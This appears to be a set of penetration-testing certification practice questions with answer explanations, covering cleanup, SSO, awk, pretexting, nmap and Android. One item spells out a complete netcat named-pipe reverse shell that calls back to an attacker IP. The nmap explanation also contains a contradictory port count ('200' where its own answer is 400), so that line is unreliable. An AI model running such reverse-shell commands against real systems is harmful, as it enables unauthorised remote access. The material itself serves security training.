During a penetration test, you obtain a reverse shell on a system by uploading a malicious .war file to a Tomcat server and then establish persistence by adding a startup service that establishes a bound root shell on port 31173. During enumeration of the system, you determine that a local user account is using its username as its password, and that the same user has scripts with hardcoded credentials stored in their home directory. Which of the following actions should be taken as part of the post-engagement cleanup for this server? (Choose two.)
A.Change the user's password to a more secure, randomly generated string and notify them via e-mail
B.Delete the lines of text containing account credentials in the scripts found in the user's home directory
C.Remove the malicious .war file
D.Delete the startup service that establishes the bound shell
C.Remove the malicious .war file
D.Delete the startup service that establishes the bound shell
Explanation
Correct Answers:
Remove the malicious .war file and Delete the startup service that establishes the bound shell are correct. When leaving a tool or file in place would expose a client to additional risk, it is a best practice to make all efforts to remove it whenever possible. These answers are the best possible examples of this in the given choices.
Incorrect Answers:
Change the user’s password to a more secure, randomly generated string and notify them via e-mail and Delete the lines of text containing account credentials in the scripts found in the user’s home directory are incorrect. The poor password and insecurely stored passwords found in the user’s scripts are examples of issues that existed at the beginning of the engagement. While it is appropriate to write these issues up as separate findings in the penetration test report, the onus is on the client to remedy these security shortcomings.
Single sign-on (SSO) architectures enhance system simplicity by allowing services requiring authentication to effectively delegate trust to another central system, relying on that system’s affirmation that a user is both identified correctly and authorized for the service they want to use. Which of the following is not an example of an SSO-enabling identity protocol?
A.Active Directory Federated Services (ADFS)
B.OpenID
C.SELinux
D.OAuth
C.SELinux
Explanation
Correct Answer:
SELinux is correct. SELinux is a security module that facilitates access control policies in Linux operating systems.
Incorrect Answers:
The other choices are incorrect because OAuth, OpenID, and Active Directory Federated Services (ADFS) are all identity protocols that enable deployment of SSO in a given network environment.
Consider an /etc/hosts file with hundreds of entries similar to the following:
`10.10.1.2 host.domain.com host`
Of the following options, which would be the best choice to create a text file containing a list of IP addresses?
A.`awk {'print $1'} /etc/hosts >> ips.txt`
B.`grep -v domain.com /etc/hosts >> ips.txt`
C.`awk {'print $2'} /etc/hosts > ips.txt`
D.`grep 10. /etc/hosts >> ips.txt`
A.`awk {'print $1'} /etc/hosts >> ips.txt`
Explanation
Correct Answer:
`awk {'print $1'} /etc/hosts >> ips.txt` is correct. The `print` function in awk can be used to extract specific columns of text as delineated by whitespace (that is, spaces or tabs), or by any other delimiter character when used with the `-F` flag. The `>>` operator is used to append output to the named file rather than overwrite the entire file each time matching data is found.
Incorrect Answers:
`grep 10. /etc/hosts >> ips.txt` is incorrect because the use of grep would pull the entire line any time a match for “10.” was found, rather than just the IP address in question.
`awk {'print $2'} /etc/hosts > ips.txt` is incorrect because the use of `{'print $2'}` in awk would print the second field of text (usually a hostname or FQDN in a hosts file) rather than the IP addresses.
`grep -v domain.com /etc/hosts >> ips.txt` is incorrect because the use of grep would pull whole lines rather than individual fields of data before feeding them into the text file. In addition, the `-v` flag would provide matches for all lines that did not contain the string “domain.com”, leaving only lines which did not contain an FQDN.
During a penetration test, you have obtained low privilege command execution via web application command injection on a target system where the installed version of netcat does not support the `-e` option. You elect to establish a reverse shell using a named pipe. The target IP address is 10.1.2.6, your attacking IP address is 10.1.2.2, and you have established a netcat listener with the command `nc -nvlp 4444`. Select the answer that will complete the command sequence to obtain a reverse shell callback.
`mknod /tmp/fifo p; /bin/sh -c "/bin/sh 0</tmp/fifo | ____"`
A.`nc 10.1.2.2 4444 2>/tmp/fifo`
B.`nc 10.1.2.2 4444 1>/tmp/fifo`
C.`1>/tmp/fifo > nc 10.1.2.2 4444`
D.`nc 10.1.2.6 4444 1>/tmp/fifo`
B.`nc 10.1.2.2 4444 1>/tmp/fifo`
Explanation
Correct Answer:
`nc 10.1.2.2 4444 1>/tmp/fifo` is correct. It takes the standard output (STDOUT, file descriptor 1) of the netcat connection (that is, commands sent by the attacker, since this is on the target system) and feeds it back into the named pipe, completing the reverse shell.
Incorrect Answers:
`nc 10.1.2.2 4444 2>/tmp/fifo` is incorrect because it would feed the STDERR output of the netcat instance to the named pipe, resulting in nothing being fed to the /bin/sh instance unless there was an error in the netcat command (which would immediately close with a nonzero exit code).
`1>/tmp/fifo > nc 10.1.2.2 4444` is incorrect for a number of reasons: the STDOUT redirect is at the beginning of the line, which would place it directly after the named pipe. This is incorrect because the output redirect needs to go from the netcat connection to the named pipe. In addition, this configuration would dump the contents of /tmp/fifo to a file named “nc” in the current working directory, then fail when attempting to execute a command named “10.1.2.2”.
`nc 10.1.2.6 4444 1>/tmp/fifo` is incorrect because it attempts to establish an nc connection to the victim node; that is, the victim is attempting to call itself rather than the attacking system. Since there would be no callback, there would be no reverse shell, making this answer incorrect.
Before beginning a physical penetration test, you decide to craft a persona wherein you are an electrician who has been asked to perform an inspection of the electrical panel and related systems for a client's building. What is this an example of? A.Interrogation B.Waterholing C.Pretexting D.Baiting
C.Pretexting
Explanation
Correct Answer:
Pretexting is correct. The crafting of a persona that is assumed during a social engineering effort, whether in person, over the phone, or via e-mail, is pretexting. It revolves around creating a reason (a pretext) for the penetration tester to be in a given place or to be asking for something.
Incorrect Answers:
Baiting is incorrect because baiting is a motivating factor defined by its use of means that tempt or entice a target into performing a given action.
Waterholing is incorrect because waterholing is the use of a trusted site to house a malicious payload.
Interrogation is incorrect because interrogation is the use of carefully asked questions to elicit information from a target.
Consider the following nmap output:
```
Nmap scan report for 10.1.2.3
Host is up (0.00034s latency).
Not shown: 389 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
5432/tcp open  postgresql
5900/tcp open  vnc

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat May 12 08:18:18 2018 -- 1 IP address (1 host up) scanned in 0.05 seconds
```
Based on this output, which of the following would have been a declared flag for this scan? A.`--top-ports=11` B.`-sV` C.`--top-ports=400` D.`-sU`
C.`--top-ports=400`
Explanation
Correct Answer:
`--top-ports=400` is correct. The clue here is in the total count of ports listed as scanned; 11 open ports shown plus 389 closed ports not shown would mean that only 200 ports were probed in this scan.
Incorrect Answers:
`--top-ports=11` is incorrect because `--top-ports=11` would only account for the 11 open ports, and not the additional 389 ports that were scanned but found to not be open.
`-sV` is incorrect because the `-sV` flag is used to perform service identification in an nmap scan.
`-sU` is incorrect because the `-sU` flag is used to trigger UDP scanning of the target in question.
The Dalvik Virtual Machine (DVM) was the original runtime used for the execution of Java-based applications with their own process in Android. It was succeeded by what new runtime starting with Android 5.0? A.OpenJRE B.Android Runtime C.Oracle JRE D.Dalvik cache
B.Android Runtime
Explanation
Correct Answer:
Android Runtime is correct. Android Runtime, or ART, is the current Java virtual machine implementation used in Android; it has been used since Android 5.0 (Lollipop).
Incorrect Answers:
Dalvik cache is incorrect because the Dalvik cache is a component of the Dalvik virtual machine. Unlike ART, which is primarily an “ahead-of-time” (AOT) virtual machine that compiles applications as soon as they are installed, Dalvik is a “just-in-time” (JIT) virtual machine, and the Dalvik cache hosts temporary compilations of apps for execution.
Oracle JRE and OpenJRE are incorrect because Oracle JRE and OpenJRE are Java environments consisting of virtual machines and related libraries for standard computer operating systems designed for laptops, desktop workstations, and servers.